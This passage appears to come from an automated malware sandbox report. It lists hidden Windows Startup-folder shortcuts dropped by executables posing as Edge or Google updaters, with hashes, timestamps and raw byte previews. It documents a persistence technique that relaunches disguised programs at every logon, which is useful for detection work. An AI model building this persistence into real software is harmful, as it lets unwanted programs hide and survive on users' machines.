                                                                                                                                                                                                                                          Preview:L..................F...."...${......e.8..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e857420dceee46fb954a73994ced1226.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:59 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.952118902161862
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8C7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8CoDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:6D0DF17C41687D01F2B91EB882545876
                                                                                                                                                                                                                                          SHA1:8D3E74279361AF32C0C912411939963B93691B25
                                                                                                                                                                                                                                          SHA-256:0FDB8854B6116B2AFFCD6A58AA4AC4A910967DE9C41E11FB831B461DD7636EF4
                                                                                                                                                                                                                                          SHA-512:0B85227EED2EA1794B920A7CAEBF17242F5132DF2466A8014122CC85DD11CB424FCAB0931CAC55FC3539B27150C3024E36D821CF863F054CF7DCEEF4796A5293
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........!..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ebae18e01c0b4596ae53abe0c92bbefb.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:56 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.943657649189787
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8G7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8GoDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:B31C6776DCDF8C2BF72BAD0EFB92332A
                                                                                                                                                                                                                                          SHA1:C0D03BAAF880BE04C6429EFD3D1D7D631155F173
                                                                                                                                                                                                                                          SHA-256:E8710152153E883AD1197FD587F778948C96B1FE44FC397149BD72BA1B4DE955
                                                                                                                                                                                                                                          SHA-512:5E7E2A87B43B5FE2C1EED5A15663E4FE992C554BBE4FE4829AAD5122DB6642691FFD6412441137F2B24E6DA1E0CD33A354C00A4628830543E0464F8F4FDCF0A6
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........L..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f145fbb386624bdc90d4fb936d0d31f9.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:27 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956711517649504
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8OTsDYlXPXv+ROvgKwj/jiSAzav/42eEFsuqygm:8OTsDYlf2ROQ7sevgosryg
                                                                                                                                                                                                                                          MD5:DC795EA6C9FA447FAF16F8CB113FD9C2
                                                                                                                                                                                                                                          SHA1:56423F0FCD3A9E849B4BF5D6C8016993DA48040E
                                                                                                                                                                                                                                          SHA-256:50A8280C6278CA6A4E813F5416CAAE69961A5E74220393F4220186C7C828199C
                                                                                                                                                                                                                                          SHA-512:9B519B822F43E786974789F4E50419937947F009BCA41797D5FC40A1371D0D0DB35B7FA196F1C5812FD4AB07C1C6192D35A16D0DEB01FA3404345E42C718AD74
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.....................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYne..Temp..:......EW<2BYne....^.....................v.@.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f1aecd4e2b3a4524ae05bac400b1e8f8.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:27 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.965799675462745
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:88sDYlXPXv+RwgK+bj/jiSAzav/42eEFsuqygm:88sDYlf2Rbb7sevgosryg
                                                                                                                                                                                                                                          MD5:32A785F5A351AEA24707F7FD23C8F55F
                                                                                                                                                                                                                                          SHA1:C08779CE4FAE8BA813F4D9F1584477B91191C1C4
                                                                                                                                                                                                                                          SHA-256:A0EEC63E21A612BA16B46195C7845744426BBA0E56C02C447B6E0CBE0D0544EF
                                                                                                                                                                                                                                          SHA-512:0C095CDD0856768723CF3ADE898E36D4A720D21CBDDFB3D9723CEEABD6682EA5F54CDB93BB714AB558C6A6665B65455B039387C6B86302ED3C5E11100A300C13
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......[$...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................{..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f589e96998a840e99c32bab51e3a14e2.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:39 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958852908895869
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8FsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8FsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:BD10AC84884BBC89AF69DC5A13E7E409
                                                                                                                                                                                                                                          SHA1:78F2CCBAA26388B33FAC9E8A5295ACD9B2735D2C
                                                                                                                                                                                                                                          SHA-256:02A410F443ECBF845DD0352094E55B41940A17BFA8C393A8BB3BE320C976D2EA
                                                                                                                                                                                                                                          SHA-512:F4BC3F55DA6833048138381546FB0DCE8A71CC1734CE533E7311A8ABC088D14DD4CF9DC5FD038CE9A57AEC5DA6875CB2B964958FCD9E91CBDB9E67D43325A36B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f9bd0fb08f8243309886214d0502bb0d.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:43 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956004358403232
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8JsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8JsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:07CA2296D88FE213AE4F878B4091AFE9
                                                                                                                                                                                                                                          SHA1:51524F223C9717E894C5EFE5FA6C836C226DCFEE
                                                                                                                                                                                                                                          SHA-256:5353D218477A71BAD926B910AE1F89FE58BA38D18ECBB084381C79929155D151
                                                                                                                                                                                                                                          SHA-512:FDCAB3103864B3A10A578190BB737659D8179C756D2F18D3B8CB7E00A0AC18C5D14EEFD05CD3D6BD87DF1881F863926E1E07BF0D4BE8CBF43ACA24FD83DE05BD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......TA..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fa77a108aacc4248a80e0b77d9590ff7.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:44 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.932477122474959
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:827cDYlXPXv+RIgKe9sjiSAzav/42eEFsuqygm:82oDYlf2Rhssevgosryg
                                                                                                                                                                                                                                          MD5:9A0829C91706922901488FE03F3EC771
                                                                                                                                                                                                                                          SHA1:23C5A422AD181CDCC8EF3762AFF5A961563F6133
                                                                                                                                                                                                                                          SHA-256:69C7199173C5452EA27F9B40A368721F6231F28A0333A92C06F5F54371CC603C
                                                                                                                                                                                                                                          SHA-512:3D7E2BA152E0B7731FFDC45DD5ABE048E7EE1886C1CEA6ABCC02CD9F6639DB4519F327566941AF12DDCAF4CDBACA064A6E96A1445426EDF1B2D41F1673504D05
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......Y..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYVe..EDGEUP~1..H......BYVeBYVe............................5.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fbd8d13802b7486295921513e688aa8e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:17 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.942207759475988
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8t7cDYlXPXv+RXgKePj/jiSAzav/42eEFsuqygm:8toDYlf2RY7sevgosryg
                                                                                                                                                                                                                                          MD5:F9D48371FD14D49E17F14F45B31614DF
                                                                                                                                                                                                                                          SHA1:0C38EBA6CE56F9B1B43172388D7EEFFBD1EC4197
                                                                                                                                                                                                                                          SHA-256:7F908423AE5423D595552AB40E363B4313267BDC8774170006ECD9042F4E61D7
                                                                                                                                                                                                                                          SHA-512:E4205EB5D19AB275E861BE7254A361E1A7D886F5211205AB8CFFD2ECF0BC3E22F3A269D45BB351ABA9B8BD18390104F2D1944998E14AFCF3A1D7230B4F0ED9A6
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......go...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYie..Temp..:......EW<2BYie....^.......................@.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fc1d17b0be824c6fbda0b504268f8568.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:46 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.95957239792977
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8VsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8VsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:6BA08CC9A8E08B34A7FC8FD7D7125721
                                                                                                                                                                                                                                          SHA1:1A17F4BBC6B87F00878B5EC24B9D8E52CD73C955
                                                                                                                                                                                                                                          SHA-256:879F364ECAEEF55BCEB01349C22920EF2B585F52290C557FD8DE88275CFB4688
                                                                                                                                                                                                                                          SHA-512:BFF7C6085800B99CCEB77B4C704D279BA3AEA9975A53F0A458523761208B808681B9C1513A4D8A331D07CC85663CDB213D09AE39AB0F601BE15E51B6C7CE5773
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fd3471df27fd4319ab5faf0a9c95ebdb.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:30 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.953992132304969
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8psDYlXPXv+RWgKrGj/jiSAzav/42eEFsuqygm:8psDYlf2Rz7sevgosryg
                                                                                                                                                                                                                                          MD5:48A82536F5B58E1F31EC0578D2ADCB6B
                                                                                                                                                                                                                                          SHA1:48C95B1B74204498808E2A883D01F157BE22854E
                                                                                                                                                                                                                                          SHA-256:0B897DACF96C478EE91170DAE9FB6FC0887C16C7C8388005CABBFD5E82561AC9
                                                                                                                                                                                                                                          SHA-512:11222C1FD72EB874A96C23487D2575936C8D3BB4882CF27807C07E1217979270CD14523C6B281D88DCA069ACF048ED8D79CACB67399B4E61DC5DB1FCE3055594
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......&x..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYpe..Temp..:......EW<2BYpe....^......................r..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fe331d6b768944e890bff83892934178.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:58 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.960536410579372
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8CsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8CsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:E315994D5980B1C2D5143FC86264B7B2
                                                                                                                                                                                                                                          SHA1:66B98CDC6A7CA666578D80C7DEA00B675E1906A2
                                                                                                                                                                                                                                          SHA-256:70F4DCCDFA1F10F5BE9CD53A3ED37A61DDEFE99649B773604D42A0E9FDC9AD0F
                                                                                                                                                                                                                                          SHA-512:B73315ADB93F4D9737A8B57E9C50B7C01E2ABD89D4269AD19A2974F99176C84CDD9793877451A9E304C2463B884DB11B10224D3E0BBF15B8FFD54341F30A73E4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
